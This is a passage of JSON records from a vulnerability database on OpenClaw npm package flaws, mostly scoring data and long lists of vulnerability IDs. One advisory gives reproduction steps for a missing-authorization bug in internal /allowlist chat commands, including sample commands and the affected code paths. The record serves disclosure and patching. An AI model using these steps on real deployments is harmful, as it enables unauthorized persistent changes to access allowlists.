                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m3mh-3mpg-37hw",
                    "reference_id": "GHSA-m3mh-3mpg-37hw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m3mh-3mpg-37hw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"
                }
            ],
            "aliases": [
                "CVE-2026-35641",
                "GHSA-m3mh-3mpg-37hw"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-brfj-4shr-qkgc"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91829?format=api",
            "vulnerability_id": "VCID-bumq-54sb-6ua7",
            "summary": "OpenClaw: Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n**Title**  \nMutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement\n\n**CWE**  \nCWE-862 Missing Authorization\n\n**CVSS v3.1**  \nCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N  \nBase score: **6.5 (Medium)**\n\n**Severity Assessment**  \nMedium. This is a real authorization flaw in OpenClaw’s internal control plane. The issue does not require host access, trusted local state tampering, or multi-tenant assumptions, but exploitation does require an already authenticated internal Gateway caller with `operator.write`.\n\n**Impact**  \nAn authenticated internal Gateway caller limited to `operator.write` can perform state-changing `/allowlist` actions without `operator.admin`, even though comparable mutating internal chat commands already require `operator.admin`. The reachable effects are persistent changes to config-backed `allowFrom` entries and pairing-store-backed allowlist entries.\n\nThis is not a semantic-modeling complaint and not a generic “trusted operator can do things” claim. It is a missing authorization check inside OpenClaw’s own internal scope model, where peer mutating command surfaces already distinguish `operator.write` from `operator.admin`.\n\n**Affected Component**  \nVerified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`.\n\nExact vulnerable path on the shipped tag:\n- `src/auto-reply/reply/commands-allowlist.ts:251-254`\n  - `/allowlist` authorization uses only `rejectUnauthorizedCommand(...)`.\n- `src/auto-reply/reply/commands-allowlist.ts:386-524`\n  - mutating config and pairing-store writes happen here, but there is no `requireGatewayClientScopeForInternalChannel(..., operator.admin, ...)`.\n\nReachability and scope model:\n- `src/gateway/method-scopes.ts:94-109`\n  - `chat.send` is a write-scoped method.\n- `src/gateway/server.chat.gateway-server-chat.test.ts:539-559`\n  - existing runtime coverage proves `chat.send` routes slash commands without an agent run.\n- `src/auto-reply/command-auth.ts:574-577`\n  - internal callers become `senderIsOwner` only when `GatewayClientScopes` includes `operator.admin`.\n\nComparable internal mutating command paths already enforce `operator.admin`:\n- `src/auto-reply/reply/commands-config.ts:64-73`\n- `src/auto-reply/reply/commands-mcp.ts:89-96`\n- `src/auto-reply/reply/commands-plugins.ts:387-394`\n- `src/auto-reply/reply/commands-acp.ts:98-106`\n\nVersion history:\n- Introduced by commit `555b2578a8cc6e1b93f717496935ead97bfbed8b` (`feat: add /allowlist command`)\n- Earliest released affected tag found: `v2026.1.20`\n- Latest released affected tag verified: `v2026.3.23`\n\n**Technical Reproduction**  \n1. Check out the shipped release tag `v2026.3.23`.\n2. Use an internal command context with:\n   - `Provider = \"webchat\"`\n   - `Surface = \"webchat\"`\n   - `GatewayClientScopes = [\"operator.write\"]`\n   - `params.command.channel = \"webchat\"`\n3. Route a slash command through `chat.send`.\n4. Execute either of these mutating commands:\n   - `/allowlist add dm channel=telegram 789`\n   - `/allowlist add dm --store channel=telegram 789`\n5. Confirm the command context is authorized but not owner-equivalent:\n   - `isAuthorizedSender === true`\n   - `senderIsOwner === false`\n6. Observe that the commands still succeed and perform persistent writes.\n\n**Demonstrated Impact**  \nThe vulnerable handler performs real state mutation for a low-scope internal caller:\n- Config-backed mutation path:\n  - `src/auto-reply/reply/commands-allowlist.ts:398-503`\n  - reads the config snapshot, applies the edit, validates, and writes the updated config to disk.\n- Store-backed mutation path:\n  - `src/auto-reply/reply/commands-allowlist.ts:479-485`\n  - `src/auto-reply/reply/commands-allowlist.ts:513-518`\n  - updates the pairing-store allowlist without any admin-scope gate.\n\nThe result is successful persistence, not just a misleading success message.\n\n**Environment**  \n- Product: OpenClaw\n- Verified shipped tag: `v2026.3.23`\n- Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2`\n- Published GitHub release time: `2026-03-23T23:15:50Z`\n- Verification date: `2026-03-24`\n\n**Duplicate Check**  \nThis is not a duplicate of:\n- `GHSA-pjvx-rx66-r3fg`\n  - that advisory covered cross-account scoping in `/allowlist ... --store`, not missing internal `operator.admin` enforcement.\n- `GHSA-hfpr-jhpq-x4rm`\n  - that advisory covered `/config` writes through `chat.send`, not `/allowlist`.\n- `GHSA-3w6x-gv34-mqpf`\n  - same authorization class, but different command path (`/acp`, not `/allowlist`).\n\n**In Scope Check**  \nThis report is in scope under `SECURITY.md` because:\n- it does **not** rely on adversarial operators sharing one gateway host or config;\n- it does **not** target the HTTP compatibility endpoints that `SECURITY.md` explicitly treats as full operator-access surfaces;\n- it demonstrates a real authorization mismatch inside OpenClaw’s own internal control-plane scope model (`operator.write` vs `operator.admin`);\n- peer mutating internal chat commands already enforce `operator.admin`, so this is not a request for a new boundary but a missing check on an existing one.\n\nThis is therefore a concrete authorization bug, not a trusted-operator hardening suggestion.\n\n**Remediation Advice**  \n1. Add `requireGatewayClientScopeForInternalChannel(..., allowedScopes: [\"operator.admin\"], ...)` to the mutating internal `/allowlist` paths.\n2. Add regression coverage for both mutation modes:\n   - internal `operator.write` must be rejected;\n   - internal `operator.admin` must be allowed.\n3. Cover both config-backed and store-backed writes.\n4. Audit other mutating internal chat-command paths for the same missing-scope pattern.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vqvg-86cc-cg83"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vqvg-86cc-cg83",
                    "reference_id": "GHSA-vqvg-86cc-cg83",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vqvg-86cc-cg83"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
